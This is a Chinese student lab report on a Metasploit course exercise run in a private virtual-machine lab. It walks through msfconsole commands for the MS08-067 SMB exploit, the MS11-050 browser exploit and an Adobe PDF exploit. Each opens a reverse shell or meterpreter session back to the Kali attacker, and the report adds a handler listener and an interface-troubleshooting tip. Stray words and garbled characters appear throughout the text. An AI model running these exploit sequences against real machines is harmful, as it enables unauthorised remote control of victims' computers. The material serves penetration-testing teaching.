本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:html
一个主动攻击实践,如ms08-067; (1分)linux
一个针对浏览器的攻击,如ms11-050;(1分)shell
一个针对客户端的攻击,如Adobe;(1分)windows
成功应用任何一个辅助模块。(0.5分)api
以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分。浏览器
exploit
,payload
,encode
?exploit
:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不必定就有Exploit(利用)。有Exploit就确定有漏洞。payload
:病毒一般会作一些有害的或者恶性的动做。在病毒代码中实现这个功能的部分叫作"有效负载"(payload)。payload能够实现任何运行在受害者环境中的程序所能作的事情,而且可以执行动做包括破坏文件删除文件,向病毒的做者或者任意的接收者发送敏感信息,以及提供通向被感染计算机的后门。encode
:编码,编制成计算机语言攻击机:Kali(IP地址:192.168.91.135)安全
靶机: windows XP SP3(English)(IP地址:192.168.91.134)网络
在攻击机kali输入msfconsole
进入控制台,依次输入如下指令:tcp
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > show payloads
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
//tcp反向回连msf exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(windows/smb/ms08_067_netapi) > set LPORT 5308
//攻击端口msf exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.91.134
//靶机ip,特定漏洞端口已经固定msf exploit(windows/smb/ms08_067_netapi) > set target 0
//自动选择目标系统类型,匹配度较高msf exploit(windows/smb/ms08_067_netapi) > exploit
//攻击
攻击机:kali (IP地址:192.168.91.135)学习
靶机:WindowsXP Professional sp2/Windows7专业版 (IP地址:192.168.91.136)
在攻击机kali输入msfconsole
进入控制台,依次输入如下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectelement
info指令查看该模块的信息
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_tcp
//http反向回连msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(ms11_050_cobjectelement) > set LPORT 5308
//攻击端口固定msf exploit(ms11_050_cobjectelement) > set URIPATH baidu
//统一资源标识符路径设置set target 1
msf exploit(ms11_050_cobjectelement) > exploit
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
使用该模块,再使用show payloads
payload
:攻击机:kali
靶机:windowsXP Professional sp2
在攻击机kali输入msfconsole进入控制台,依次输入如下指令:
先用search adobe
得知此漏洞所在的模块
show targets
查看能够被攻击的靶机的操做系统型号msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp
反向回连msf exploit(adobe_cooltype_sing) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(adobe_cooltype_sing) > set LPORT 5308
//攻击端口msf exploit(adobe_cooltype_sing) > set FILENAME 5308hwf.pdf
//设置生成pdf文件的名字msf exploit(adobe_cooltype_sing) > exploit
//攻击在kali上进入监听模块,输入如下命令:
msf > use exploit/multi/handler
//进入监听模块msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
//tcp反向链接msf exploit(handler) > set LHOST 192.168.91.135
//攻击机ipmsf exploit(handler) > set LPORT 5308
//攻击端口固定msf exploit(handler) > exploit
针对这个问题,我以前的解决办法其一是关闭虚拟机,从新开一遍,地址就会正常了。其二就是从新安一下虚拟机,因此个人硬盘中虚拟机老是得备份。可是老是出现这个问题也不是办法,我相信有的同窗也遇到过这个问题(不会只有我这么惨吧???)
解决:
通常是eth0被禁掉了,就只会显示127.0.0.1这个回环地址 你用
ifup eth0
ifconfig up eth0
上面两个命令均可以,而后 /etc/init.d/network restart
你就能看到eth0了。
https://blog.csdn.net/qq_36769100/article/details/71473632
本次实验经过经过MSF的攻击模块对计算机进行各类攻击方法的实践,比前几回的攻击更加的系统化,同时攻击的方法更加深刻。经过最后一个板块的研究,使我将学习理论知识转化为自我实践过程。
在其中某些模块的学习中,老是会有攻击不成功的地方,每当不成功,我就很懊恼,为啥老是很别人的不同。可是在课上听到老师说,攻击不成功是很正常的事情,我忽然感受到了信心。而后经过查找学长学姐或是网上的解决方法,不断解决问题,最后成功,感受颇有成就感。